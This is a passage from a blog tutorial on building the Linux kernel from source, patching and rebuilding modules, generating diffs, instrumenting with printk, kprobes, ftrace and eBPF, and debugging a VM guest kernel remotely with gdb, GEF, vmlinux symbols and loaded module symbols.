By using <code>oldconfig</code> instead of <code>menuconfig</code> we can avoid the ncurses interface and just update the kernel configuration using our <code>.config</code> (it just means we may get some prompts during the make process for new options):</p><pre><code class="language-sh">$ make oldconfig</code></pre><p>Now we&apos;re ready to start <strong>building</strong> the kernel, and depending on your system and the <code>.config</code> we&apos;ve copied over, this can <em>take a while</em>, so fire up all CPU cores:</p><pre><code class="language-sh">$ make -j$(nproc)</code></pre><p>Next up, we can start installing our freshly built kernel. First up are the modules, which will typically be installed to <code>/lib/modules/&lt;kernel_vers&gt;</code>. So, to install our modules we&apos;ll go ahead and run:</p><pre><code class="language-sh">$ sudo make modules_install</code></pre><p>Finally we&apos;ll install the kernel itself; the following command will do all the housekeeping required to let us select the new kernel from our bootloader:</p><pre><code class="language-sh">$ sudo make install </code></pre><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/03/mission_accomplished.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="480" height="202"></figure><p>And voila! Just like that we&apos;ve built our Linux kernel from source, nabbing the config from our current environment, and we&apos;re ready to do some tinkering! </p><h3 id="module-patching">Module Patching</h3><p>Okay, now we have a clean environment to work with and can start tinkering! 
Because we&apos;ve built the kernel from source, we know we&apos;re building our patched modules in the exact same development environment as the kernel we&apos;re installing them into.</p><p>While the initial build can be lengthy, it&apos;s straightforward and we avoid the headache of out-of-tree module taints, signing issues and other finicky version-mismatch related issues.</p><p>Instead, we can make whatever changes we intend to make to our module and then run much the same commands we did during the initial install, only targeting our patched module(s). For example, for CVE-2022-0435 I tested patches in <code>net/tipc/monitor.c</code>, so to rebuild and install my patched module I&apos;d simply run:</p><pre><code>$ make M=net/tipc
$ sudo make M=net/tipc modules_install</code></pre><p>I&apos;m then able to go ahead and re/load <code>tipc</code> and we&apos;re good to go! Easy as that.</p><h3 id="shortcuts-alternatives">Shortcuts &amp; Alternatives</h3><p>As some of you may already be painfully aware, building a full-featured kernel can actually take some time, especially in a VM with limited resources. </p><h4 id="minimal-configs">Minimal Configs</h4><p>So to speed things up dramatically, if you&apos;re familiar with the module(s) you&apos;re going to be looking at, a more efficient approach is to start from a minimal config and enable the bare minimum features required for your testing environment.</p><p>For example <code>$ make defconfig</code> will generate a minimal default config for your arch, and then you can use <code>$ make menuconfig</code> to make further adjustments.</p><h4 id="skip-building-altogether">Skip Building Altogether</h4><p>Depending on your requirements, you can just avoid building altogether:</p><ul><li>if you just want to do some debugging, you could pull debug symbols from your distribution repo (see section on symbols below)</li><li>you may be able to fetch source from your distro repos, where you can then patch and build modules from there</li><li>if you don&apos;t need to worry about module signing/taint, and you&apos;re happy to get messy, there&apos;s hackier ways to do all this too</li></ul><h2 id="getting-stuck-in">Getting Stuck In</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/03/fun_begins.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="480" height="230"></figure><p>Now that we&apos;ve got our kernel dev environment setup, it&apos;s time to get stuck in! 
I&apos;ll briefly touch on generating patches, because why not, and instrumentation (though I&apos;m not as familiar with this topic) before finally covering how we can debug kernel modules.</p><h3 id="patch-diffs">Patch Diffs</h3><p>Disclaimer, if you want to submit any patches to the kernel formally, then definitely check out this <strong><em>comprehensive</em></strong> kernel doc on the various dos &amp; donts of <a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">submitting patches</a>.</p><p>That said, we&apos;re just playing around here! Plus I don&apos;t think it actually mentions the command in that particular doc. Anyway, I digress, we can run the following commands to generate a simple patch diff between two files:</p><pre><code class="language-sh">$ diff -u monitor.c monitor_patched.c 
--- monitor.c   2021-03-11 13:19:18.000000000 +0000
+++ monitor_patched.c 2022-04-06 19:25:27.449661568 +0100
@@ -503,8 +503,10 @@
        /* Cache current domain record for later use */
        dom_bef.member_cnt = 0;
        dom = peer-&gt;domain;
-       if (dom)
+       if (dom) {
+               printk(&quot;printk debugging ftw!\n&quot;);
                memcpy(&amp;dom_bef, dom, dom-&gt;len);
+       }
 
        /* Transform and store received domain record */
        if (!dom || (dom-&gt;len &lt; new_dlen)) {
</code></pre><p>Where <code>-u</code> tells <code>diff</code> to use the unified format, which provides us with 3 lines of unified context (this is the standard, but N lines of context can be specified with <code>-U N</code>). </p><p>This unified format provides a line-by-line comparison of the given files, letting us know what&apos;s changed from one to another:</p><ol><li>Line 2 is part of the patch header, prefixed with <code>---</code>, and tells us the original file, date created and timezone offset from UTC (thanks <a href="https://twitter.com/kfazz01">@kfazz01</a>!)</li><li>Line 3 is also part of the header, prefixed with <code>+++</code>, and tells us the new file, date created and timezone offset from UTC (thanks <a href="https://twitter.com/kfazz01">@kfazz01</a>!)</li><li>Line 4, encapsulated by <code>@@</code>, defines the start of a &quot;hunk&quot; (group) of changes in our diff; sticking to <code>-</code> for original and <code>+</code> for new, <code>-503,8</code> tells us this hunk is starting from line 503 in <code>monitor.c</code> and shows 8 lines. <code>+503,10</code> means the hunk also starts from line 503 in <code>monitor_patched.c</code> but shows 10 lines (which checks out as we removed 1 and added 3).</li><li>Lines 5-7 &amp; 13-15 are our 3 lines of unified context, just to give us some idea of what&apos;s going on around the lines we&apos;ve changed</li><li>Lines 8-12 then are, by process of elimination, the lines we&apos;ve changed. Changing things up, now <code>-</code> prefixes lines we&apos;ve removed (i.e. in <code>monitor.c</code> but no longer in <code>monitor_patched.c</code>) and <code>+</code> prefixes lines we&apos;ve added to <code>monitor_patched.c</code></li></ol><p>So there&apos;s a quick ramble on patch diffs. It&apos;s as easy as that. 
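</p><p>If you ever want to consume these hunk headers programmatically, they&apos;re trivial to parse. Here&apos;s a quick sketch in C (note that unified diffs may omit a count of 1 entirely, e.g. <code>@@ -503 +503 @@</code>, which this toy parser doesn&apos;t handle):</p><pre><code class="language-C">#include &lt;assert.h&gt;
#include &lt;stdio.h&gt;

/* Parse a unified hunk header like &quot;@@ -503,8 +503,10 @@&quot;; returns 0 on success */
static int parse_hunk(const char *line, long *old_start, long *old_count,
                      long *new_start, long *new_count)
{
    return sscanf(line, &quot;@@ -%ld,%ld +%ld,%ld @@&quot;,
                  old_start, old_count, new_start, new_count) == 4 ? 0 : -1;
}

int main(void)
{
    long os, oc, ns, nc;

    assert(parse_hunk(&quot;@@ -503,8 +503,10 @@&quot;, &amp;os, &amp;oc, &amp;ns, &amp;nc) == 0);
    assert(os == 503 &amp;&amp; oc == 8);  /* original: starts at line 503, 8 lines shown */
    assert(ns == 503 &amp;&amp; nc == 10); /* patched: starts at line 503, 10 lines shown */
    printf(&quot;-%ld,%ld +%ld,%ld\n&quot;, os, oc, ns, nc);
    return 0;
}</code></pre><p>Handy if you&apos;re scripting around patches, e.g. mapping hunks back to source lines.</p><p>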
We can also do diffs on entire directories/globs of files:</p><pre><code>$ diff -Naur net/tipc/ net/tipc_patched/</code></pre><p>Where <code>-N</code> treats missing files as empty, <code>-a</code> treats all files as text, <code>-r</code> recursively compares subdirs and <code>-u</code> is the same as before. </p><p>If we want to save these patches and apply them down the line, we can redirect the output into a file and then apply it to the original:</p><pre><code class="language-sh">$ diff -u monitor.c monitor_patched.c &gt; monitor.patch
$ patch -p0 &lt; monitor.patch 
patching file monitor.c
</code></pre><p>When we pass <code>patch</code> a patch file, it expects an argument <code>-pX</code> where <code>X</code> defines how many directory levels to strip from our patch header. Ours was like <code>--- monitor.c</code>, so we include <code>-p0</code> as there&apos;s 0 dir levels to strip!</p><h3 id="instrumentation">Instrumentation</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/03/printk-1.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="498" height="276"></figure><p>Memes aside, <code>printf()</code> does the job in your own C projects; <code>printk()</code> is just the kernel-land equivalent<sup>[1]</sup> and sometimes a cheeky <code>printk(&quot;here&quot;)</code> is all you need.</p><p>Using the patching approach we mentioned above, sometimes the easiest way to debug or trace execution isn&apos;t to set up some complicated framework but simply to sprinkle in some <code>printk()</code>&apos;s and rebuild your module and voila! </p><p>And well, that&apos;s the extent of my practical kernel instrumentation knowledge. But I&apos;d feel bad making a whole section just to meme <code>printk()</code>, so while I can&apos;t expand on them fully, here are a couple of other avenues for kernel instrumentation:</p><h4 id="kprobes">kprobes</h4><blockquote>kprobes enable you to dynamically break into any kernel routine and collect debugging and performance information non-disruptively. You can trap at almost any kernel code address, specifying a handler routine to be invoked when the breakpoint is hit &#x2014; <a href="https://www.kernel.org/doc/html/latest/trace/kprobes.html">kernel.org/doc</a></blockquote><p>kprobes provide a fairly comprehensive API for your instrumentation needs, however the flip side is that it does require some light kernel development skills (perhaps a good intro task to kernel development??) to get stuck in. 
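</p><p>Since we&apos;ve leaned on <code>printk()</code> a fair bit, one detail worth knowing: the log levels (<code>KERN_INFO</code> and friends) aren&apos;t separate arguments, they&apos;re string literals that the preprocessor pastes onto the front of your format string. Here&apos;s a userland sketch of the mechanism, with the macro values mirrored from <code>include/linux/kern_levels.h</code>:</p><pre><code class="language-C">#include &lt;assert.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

/* mirrored from include/linux/kern_levels.h: an ASCII SOH byte + level digit */
#define KERN_SOH  &quot;\001&quot;
#define KERN_ERR  KERN_SOH &quot;3&quot;
#define KERN_INFO KERN_SOH &quot;6&quot;

int main(void)
{
    /* printk(KERN_INFO &quot;...&quot;) really receives one concatenated string */
    const char *msg = KERN_INFO &quot;printk debugging ftw!\n&quot;;

    assert(msg[0] == &apos;\001&apos;); /* SOH marker */
    assert(msg[1] == &apos;6&apos;);    /* loglevel 6, i.e. KERN_INFO */
    assert(strcmp(msg + 2, &quot;printk debugging ftw!\n&quot;) == 0);
    printf(&quot;level %c, body: %s&quot;, msg[1], msg + 2);
    return 0;
}</code></pre><p>This is also why a bare <code>printk(&quot;here&quot;)</code> works: with no prefix, the kernel just falls back to the default loglevel.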
</p><h4 id="ftrace">ftrace</h4><p>ftrace, or function tracer, is &quot;an internal tracer designed to help out developers and designers of systems to find what is going on inside the kernel [...] although ftrace is typically considered the function tracer, it is really a frame work of several assorted tracing utilities.&quot; <sup><a href="https://www.kernel.org/doc/Documentation/trace/ftrace.txt">[2]</a></sup>.</p><p>ftrace is actually quite interesting, as unlike similarly named (but not to be confused) tools like <code>strace</code>, there is no usermode binary to interact with the kernel component. Instead, users interact with the tracefs file system.</p><p>For the sake of brevity, if you&apos;re interested in checking out ftrace, here is an introductory guide by Gaurav Kamathe on opensource.com:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://opensource.com/article/21/7/linux-kernel-ftrace"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Analyze the Linux kernel with ftrace</div><div class="kg-bookmark-description">An operating system&#x2019;s kernel is one of the most elusive pieces of software out there. It&#x2019;s always there running in the background from the time your system gets turned on.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://opensource.com/themes/osdc/assets/img/favicons/favicon.ico" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules"><span class="kg-bookmark-author">Supported by Red Hat</span><span class="kg-bookmark-publisher">Gaurav Kamathe</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opensource.com/sites/default/files/lead-images/linux_keyboard_desktop.png" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules"></div></a></figure><h4 id="ebpf">eBPF??</h4><p>Okay, this might be a bit of a rogue one. 
Quick disclaimer being I&apos;ve unfortunately not found the time, despite it being high up on my list, to properly play with eBPF. So take any statements RE eBPF features with a pinch of salt! </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/04/idkanything.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="480" height="270"></figure><p>That said, to summarise (I think I got this bit right), eBPF is a kernel feature introduced in 4.x that allows privileged usermode applications to run sandboxed code in the kernel. </p><p>I&apos;m particularly interested in seeing the limits of its application, especially in spaces such as detection, rootkits and debugging; for something originally focused on networking. </p><p>Although, RE instrumentation &amp; debugging, I&apos;m not sure how much extra mileage eBPF would be able to provide. The eBPF bytecode runs in a sandboxed environment within the kernel, and as far as I&apos;m aware can&apos;t alter kernel data.</p><p>That said, from an instrumentation perspective we can still do some interesting tracing. For example, we can attach to one of our kprobes and read function args &amp; ret values.</p><p>Anyway, perhaps just some food-for-thought, but I&apos;ll stop rambling! 
I&apos;ll drop a couple of links below to existing publications on eBPF instrumentation/debugging <sup>[3]</sup>.</p><hr><ol><li>The reason it&apos;s <code>printk()</code>, and not the classic <code>printf()</code> we usually find in C, is that the C standard library isn&apos;t available in kernel mode; so the <code>k</code> in <code>printk()</code> lets us know we&apos;re using the kernel-land implementation.</li><li><a href="https://www.kernel.org/doc/Documentation/trace/ftrace.txt">https://www.kernel.org/doc/Documentation/trace/ftrace.txt</a></li><li><a href="https://www.usenix.org/sites/default/files/conference/protected-files/lisa18_slides_babrou.pdf">Debugging Linux issues with eBPF</a> (USENIX LISA18)</li><li><a href="https://elinux.org/images/d/dc/Kernel-Analysis-Using-eBPF-Daniel-Thompson-Linaro.pdf">Kernel analysis using eBPF</a></li></ol><h3 id="debugging">Debugging</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/04/noidea.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="270" height="187"></figure><p>Working with something as complex as the Linux kernel, you&apos;ll inevitably find yourself resonating with the above gif, and that&apos;s alright! That said, getting a smooth debugging workflow set up can go a long way to alleviating the confusion.</p><p>Setting up a good debugging environment means you can set breakpoints, allowing you to pause kernel execution at moments of interest, as well as inspect, and even change, registers and memory! There&apos;s also scope for scripting various elements of this process too.</p><h4 id="gdb-debugging-stub">GDB Debugging Stub</h4><p>Remember about 2000 words ago I mentioned the only real assumption I was going to make is that you&apos;re doing your kernel testing/shenanigans in a VM? </p><p>It turns out that trying to debug the kernel you&apos;re running is... tricky. 
So besides snapshots and various other QoL features, a big pro to using VMs is the ability to remotely debug them at the kernel-level from our host (or another guest) using a debugger<sup><a href="https://www.sourceware.org/gdb/">[1]</a></sup>.</p><p>The debugger in question, gdb, or the GNU Project debugger<sup><a href="https://www.sourceware.org/gdb/">[1]</a></sup>, is a portable debugger that runs on many UNIX-like systems and is basically the de facto Linux kernel debugger (@ me). </p><p>Thanks to gdbstubs<sup><a href="https://sourceware.org/gdb/onlinedocs/gdb/Remote-Stub.html">[2]</a></sup>, implementations of gdb&apos;s remote protocol provided by the virtualisation software (VMware, QEMU etc.), we&apos;re able to remotely debug our guest kernel with much the same functionality we&apos;d expect from userland debugging: breakpoints, viewing/setting registers and memory etc. etc.<sup>[3]</sup></p><p>I&apos;ll use this opportunity to plug <a href="https://gef.readthedocs.io/en/master/">GEF</a> (GDB Enhanced Features) cos let&apos;s not forget gdb is like 36 years old and your boy needs some colours up in his CLI. Beyond just colours, gef has a great suite of quality-of-life features that just make the debugging workflow easier.</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2757;</div><div class="kg-callout-text">Note that future GDB snippets will be using GEF, definitely not in an attempt to convert you, so don&apos;t be scared by the `gef&#x27A4;` prompt; it&apos;s all the same program.</div></div><p>Anyway, enough rambling, let&apos;s take a look at getting kernel debugging setup on our VM:</p><ol><li><strong>Enable the gdbstub on your guest</strong><sup><a href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#gdb--vm">[4]</a></sup>; typically this will listen on an interface:port you specify on the host. E.g. QEMU by default listens on <code>localhost:1234</code>. 
</li><li>Now on your host, or another guest that can reach the listening interface on your host, you can spin up gdb<sup>[5]</sup> and connect:</li></ol><pre><code class="language-sh">$ gdb
...
gef&#x27A4; target remote :1234 
gef&#x27A4; # you can omit localhost, so just :1234 works too</code></pre><p>And just like that, you&apos;re now remotely debugging the Linux kernel - awesome, right? Except if you&apos;ve just fired up gdb and connected like the snippet above, you&apos;re probably seeing something like this:</p><pre><code>gef&#x27A4;  target remote :12345
Remote debugging using :12345
warning: No executable has been specified and target does not support
determining executable automatically.  Try using the &quot;file&quot; command.
0xffffffffa703f9fe in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500; registers &#x2500;&#x2500;&#x2500;&#x2500;
[!] Command &apos;context&apos; failed to execute properly, reason: &apos;NoneType&apos; object has no attribute &apos;all_registers&apos;
gef&#x27A4;  info reg
...
rip            0xffffffffa703f9fe  0xffffffffa703f9fe

</code></pre><p>Huh, so we&apos;ve connected and it looks like we&apos;ve trapped execution at <code>0xffffffffa703f9fe</code>, but gdb has no idea where we are... This does not bode well for a productive debugging session; so let&apos;s look at how to fix that!</p><h4 id="vmlinux-symbols-kaslr">vmlinux, symbols &amp; kaslr</h4><p>So although our gdb has managed to make contact with the gdbstub on our guest, it&apos;s far from omnipotent. It can interact with memory and read the registers, as it understands the architecture, however it doesn&apos;t know about the kernel&apos;s functions and data structures.</p><p>Unfortunately for us that&apos;s the whole reason we&apos;re doing kernel debugging, to debug the kernel! Luckily though, it&apos;s fairly simple to tell gdb everything it needs to know.</p><p>If you&apos;ve read my <a href="https://sam4k.com/linternals-the-modern-boot-process-part-2/">Linternals: The (Modern) Boot Process [0x02]</a>, you&apos;ll know that there&apos;s a file called <code>vmlinux</code> containing the decompressed kernel image as a statically linked ELF. Just like debugging a userland binary, we can load this <code>vmlinux</code> into gdb and it&apos;s able to interpret it without any dramas.</p><p>Importantly, though, just like userland debugging we want to make sure we load a <code>vmlinux</code> with debugging symbols included; there are a couple of options for this:</p><!--kg-card-begin: markdown--><ul>
<li>If you&apos;re building from source, just include <code>CONFIG_DEBUG_INFO=y</code> and optionally <code>CONFIG_GDB_SCRIPTS=y</code> and you&apos;ll find your vmlinux with debug symbols in your build root (see <a href="compiling/README.md">compiling/README.md</a> for more info on building)
<ul>
<li><code>./scripts/config -e DEBUG_INFO -e GDB_SCRIPTS</code> will enable these in your config with minimal fiddling</li>
</ul>
</li>
<li>If you&apos;re running a distro kernel, you can check your distro&apos;s repositories to see if you can pull debug symbols
<ul>
<li>On Ubuntu, if you update your sources and keyring <a href="https://wiki.ubuntu.com/Debug%20Symbol%20Packages">[1]</a>, you can pull the debug symbols by running <code>$ sudo apt-get install linux-image-$(uname -r)-dbgsym</code> and should find your <code>vmlinux</code> @ <code>/usr/lib/debug/boot/vmlinux-$(uname -r)</code></li>
</ul>
</li>
</ul>
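<p>Putting the build-from-source route together, the whole flow looks something like this (a sketch using the standard kbuild targets, run from your kernel source tree):</p>
<pre><code class="language-sh"># enable debug info (and the gdb helper scripts) in your existing .config
./scripts/config -e DEBUG_INFO -e GDB_SCRIPTS
make olddefconfig   # resolve any newly-exposed options with their defaults
make -j$(nproc)     # vmlinux with debug symbols lands in the build root
file vmlinux        # sanity check: should mention debug_info / not stripped</code></pre>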
<!--kg-card-end: markdown--><p>And just like that, we&apos;re done! jk, there&apos;s one more common gotcha (that I always forget) and that&apos;s KASLR: Kernel Address Space Layout Randomization. As it sounds, this randomizes where the kernel image is loaded into memory at boot time; so the addresses gdb reads from the vmlinux will naturally be wrong... </p><ul><li>You can either add <code>nokaslr</code> to your boot options, typically via the grub menu at boot</li><li>Or by editing <code>/etc/default/grub</code> and including <code>nokaslr</code> in <code>GRUB_CMDLINE_LINUX_DEFAULT</code></li></ul><p>After that we really are ready, and can repeat the steps from before, this time remembering to also load our <code>vmlinux</code> with gdb:</p><pre><code class="language-sh">$ gdb vmlinux
...
gef&#x27A4;  target remote :12345 
... 
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500; threads &#x2500;&#x2500;&#x2500;&#x2500;
[#0] Id 1, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
[#1] Id 2, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
[#2] Id 3, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
[#3] Id 4, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500; trace &#x2500;&#x2500;&#x2500;&#x2500;
[#0] 0xffffffff81c3f9fe &#x2192; native_safe_halt()
[#1] 0xffffffff81c3fc4d &#x2192; arch_safe_halt()
[#2] 0xffffffff81c3fc4d &#x2192; acpi_safe_halt()
[#3] 0xffffffff81c3fc4d &#x2192; acpi_idle_do_entry(cx=0xffff88810187d864)
[#4] 0xffffffff816e4201 &#x2192; acpi_idle_enter(dev=&lt;optimized out&gt;, drv=&lt;optimized out&gt;, index=&lt;optimized out&gt;)
[#5] 0xffffffff8198e56d &#x2192; cpuidle_enter_state(dev=0xffff888105a61c00, drv=0xffffffff8305dfa0 &lt;acpi_idle_driver&gt;, index=0x1)
[#6] 0xffffffff8198e88e &#x2192; cpuidle_enter(drv=0xffffffff8305dfa0 &lt;acpi_idle_driver&gt;, dev=0xffff888105a61c00, index=0x1)
[#7] 0xffffffff810e7fa2 &#x2192; call_cpuidle(next_state=0x1, dev=0xffff888105a61c00, drv=0xffffffff8305dfa0 &lt;acpi_idle_driver&gt;)
[#8] 0xffffffff810e7fa2 &#x2192; cpuidle_idle_call()
[#9] 0xffffffff810e80c3 &#x2192; do_idle()
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;
gef&#x27A4;  
</code></pre><p>Awesome! Now gdb knows exactly where we are, and gef provides us lots of useful information in its <code>ctx</code> menu, which you can always pop up with the <code>ctx</code> command.</p><p>I&apos;ve cut it off for brevity but we can at a glance see sections (might need to scroll right for the headings) for registers, stack, code, threads and trace! </p><p>On top of that, as I&apos;ll touch on in <strong>Misc GDB Tips </strong>below, we&apos;re able to explore all the kernel structures and more thanks to the symbols we now have.</p><h4 id="loadable-modules">Loadable Modules</h4><p>As a quick aside, you might find out that some symbols for certain modules are missing, despite doing all that <code>vmlinux</code> faff above. This is because not all modules are compiled into the kernel; some are compiled as loadable modules.</p><p>This means that the modules are only loaded into memory when they&apos;re needed, e.g. via <code>modprobe</code>. We can check how a module is built in our <code>.config</code>:</p><ul><li><code>CONFIG_YOUR_MODULE=y</code> defines a built-in module</li><li><code>CONFIG_YOUR_MODULE=m</code> defines a loadable kernel module</li></ul><p>For loadable modules, we need to do a couple of extra steps, <strong>in addition to those above</strong>, in order to let gdb know about these symbols:</p><ul><li>Copy the module&apos;s <code>your_module.ko</code> from your debugging target; try <code>/lib/modules/$(uname -r)/kernel/</code></li><li>On your debugging target, find out the base address of the module; try <code>sudo grep -e &quot;^your_module&quot; /proc/modules</code></li><li>In your gdb session, you can now load in the module by <code>(gdb) add-symbol-file your_module.ko 0xAddressFromProc</code> - voila!</li></ul><p>Sorted! Now the symbols from <code>your_module</code> should be available in gdb! 
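Those last two steps can even be glued together with a tiny helper; a sketch, where the module name and load address are placeholders:</p><pre><code class="language-sh"># given a line from /proc/modules, emit the matching gdb command;
# fields in a /proc/modules line are: name size refcount deps state load_address
mod_symbol_cmd() {
    set -- $1  # deliberately unquoted, so the line splits into fields
    printf 'add-symbol-file %s.ko %s\n' $1 $6
}

# in practice: mod_symbol_cmd "$(sudo grep -e ^your_module /proc/modules)"
mod_symbol_cmd 'your_module 16384 0 - Live 0xffffffffc0a00000'
# prints: add-symbol-file your_module.ko 0xffffffffc0a00000</code></pre><p>Paste the printed command into your gdb session and you&apos;re away. 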
